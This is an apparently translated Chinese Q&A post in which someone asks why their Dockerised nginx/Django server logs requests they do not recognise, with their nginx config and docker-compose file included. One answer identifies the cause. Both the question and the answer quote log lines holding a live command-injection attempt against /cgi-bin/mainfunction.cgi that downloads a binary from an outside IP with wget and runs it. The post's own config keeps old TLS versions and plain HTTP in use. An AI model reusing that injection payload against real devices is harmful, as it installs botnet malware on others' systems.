我正在使用以下设置在生产服务器上使用Django运行nginx:
# normally you leave this at the default of 1024
events {
worker_connections 1024;
}
http {
# cf http://blog.maxcdn.com/accept-encoding-its-vary-important/
gzip_vary on;
gzip_proxied any;
gzip_types *;
# http://nginx.org/en/docs/http/configuring_https_servers.html#optimization
ssl_session_cache shared:SSL:1m;
ssl_session_timeout 10m;
server_tokens off;
upstream django {
server webapp:8000;
}
# ---------------------------------------------------------------------------
# Production
#
# Use this configuration for a deployment. You'll have to configure SSL.
# ---------------------------------------------------------------------------
#server {
# # rewrite all HTTP to HTTPS
# listen 80;
# server_name ${NGINX_SERVER_NAME};
#
# return 301 https://${NGINX_SERVER_NAME}${DOLLAR}request_uri;
#}
# ---------------------------------------------------------------------------
# Development
#
# You may use this for development. It doesn't use SSL, making it unsafe.
# Remove this setting when moving to production.
# ---------------------------------------------------------------------------
server {
# rewrite all HTTP to HTTPS
listen 80;
server_name ${NGINX_SERVER_NAME};
location /static {
alias /srv/covidoff/static;
# http://stackoverflow.com/q/19213510/1346257
include /etc/nginx/mime.types;
}
location = /robots.txt { return 200 "User-agent: *\nAllow: /"; }
location = /favicon.ico { access_log off; log_not_found off; return 404; }
location / {
uwsgi_pass django;
include uwsgi_params;
}
}
server {
listen 443 ssl default_server;
server_name ${NGINX_SERVER_NAME};
# see http://nginx.org/en/docs/http/configuriNGINX_https_servers.html
ssl_certificate /etc/ssl/certs/${NGINX_CRT_NAME}.crt;
ssl_certificate_key /etc/ssl/private/${NGINX_KEY_NAME}.key;
ssl_prefer_server_ciphers on;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # ie defaults minus SSLv3
location /static {
alias /srv/covidoff/static;
# http://stackoverflow.com/q/19213510/1346257
include /etc/nginx/mime.types;
}
location = /robots.txt { return 200 "User-agent: *\nAllow: /"; }
location = /favicon.ico { access_log off; log_not_found off; return 404; }
location / {
uwsgi_pass django;
include uwsgi_params;
}
}
}
注意:我知道设置不应该是这样的,因为它不使用HTTPS,但这就是我们目前正在使用的设置。应该稍后再解决。
让我感到困惑的一件事是-提供给我的Docker设置-有两个配置nginx文件,另一个是:
server {
listen 80;
location / {
proxy_pass http://localhost:8000;
proxy_redirect off;
}
}
最糟糕的是,docker compose yaml文件似乎指向第二个文件,而不是第一个文件,而是我对第一个文件所做的更改反映在服务器上。
version: "3"
volumes:
static-files:
driver: local
postgres:
driver: local
services:
db:
image: postgres:11.1
volumes:
- postgres:/var/lib/postgresql/data/pgdata
env_file:
- ./config/environment/development.env
expose:
- "5432"
webserver:
build: ./nginx
ports:
- "80:80"
- "443:443"
webapp:
build:
context: webapp
volumes:
- ./webapp/covidoff:/srv/covidoff
- static-files:/srv/static-files
ports:
- "8000:8000"
depends_on:
- db
env_file:
- ./config/environment/development.env
您可以看到完整的项目here。
现在我不太担心服务器配置,但是对于我要指出的内容可能很重要。
启动后(例如docker-compose up -d),我看到了nginx的日志,它们是...嗯...很奇怪。
从docker-compose中可以看到,我正在运行三个服务:Django,nginx和Postgres。使用docker logs,我发现Django服务经常被请求打中,但是这些请求没有显示在nginx服务器上。
相反,nginx只会显示我确实不知道它来自哪里的内容,例如对index.php的请求:
124.156.160.69 - - [02/Apr/2020:18:05:24 +0000] "GET /websql/index.php HTTP/1.1" 502 559 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" "-"
甚至GET /,因为部署中没有这样的东西:
202.52.58.6 - - [02/Apr/2020:18:35:50 +0000] "GET / HTTP/1.1" 502 157 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" "-"
95.70.169.166 - - [02/Apr/2020:19:36:19 +0000] "GET / HTTP/1.1" 400 157 "-" "-" "-"
186.64.111.98 - - [02/Apr/2020:19:36:51 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1" 400 157 "-" "-" "-"
2020/04/02 20:18:20 [error] 8#8: *2171 connect() failed (111: Connection refused) while connecting to upstream, client: 209.17.97.2, server: , request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:8000/", host: "34.242.160.202:80"
209.17.97.2 - - [02/Apr/2020:20:18:20 +0000] "GET / HTTP/1.1" 502 157 "-" "Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)" "-"
我需要的是普通的access.log,其中的请求正在击中django。我不知道nginx的日志显示了什么,或者这些请求来自哪里。
我是nginx泊坞窗容器,如果运行docker exec -it de807b6ad160 ls /var/log/nginx -la,则会得到:
lrwxrwxrwx 1 root root 11 Oct 21 19:02 access.log -> /dev/stdout
lrwxrwxrwx 1 root root 11 Oct 21 19:02 error.log -> /dev/stderr
这意味着日志文件为空,并且(正确地)被重定向到stdout / stderr。
我想念什么?
答案 0 :(得分:0)
显然,对/cgi-bin/mainfunction.cgi的调用是一种用于创建服务器远程登录的漏洞,我刚才有相同的调用,我正在运行其他Web服务器,例如Apache。
200.188.153.18 - - [03/Apr/2020:11:03:34 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1" 400 0 "-" "-"
我看到的唯一区别是IP的来源和响应(400)